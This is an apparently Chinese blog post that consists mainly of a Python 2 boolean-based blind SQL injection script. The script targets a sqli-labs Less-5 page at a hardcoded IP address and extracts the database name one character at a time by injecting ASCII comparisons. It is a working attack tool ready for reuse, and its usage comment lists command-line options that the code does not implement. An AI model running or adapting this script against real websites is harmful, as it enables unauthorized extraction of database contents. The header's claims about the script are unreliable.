盲注脚本2

盲注脚本2

关注
发信
关注(28)粉丝(399)

盲注脚本2.基于bool

盲注脚本2.基于bool

 #!/usr/bin/env python

 #encoding:utf-8

 #by i3ekr

 #using

 #    python sqlinject.py -D "数据库名" -T "表明" -C "列明" --dump "列明"

 #

 import requests,re,os

 web = "http://139.199.179.167/sql-inject/sqli-labs/Less-5/index.php?id=1"

 payloads = list("abcdefghijklmnopqrstuvwxyz0123456789@_.")

 headers = {

     'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',

 }

 value = ''

 for i in xrange(1,15,1):

     for payload in payloads:

         url = web + "' and ascii(mid(database(),%d,1))=%d--+"%(i,ord(payload))

         html_doc = requests.get(url,params=headers,timeout=2).text

         if "You are" in html_doc:

             value += payload

             print "[+][%d] database name is:%s"%(i,payload)

             break

         else:

             pass

 print value
05-06 05:40
Powered by LMLPHP ©2024 盲注脚本2 0.075260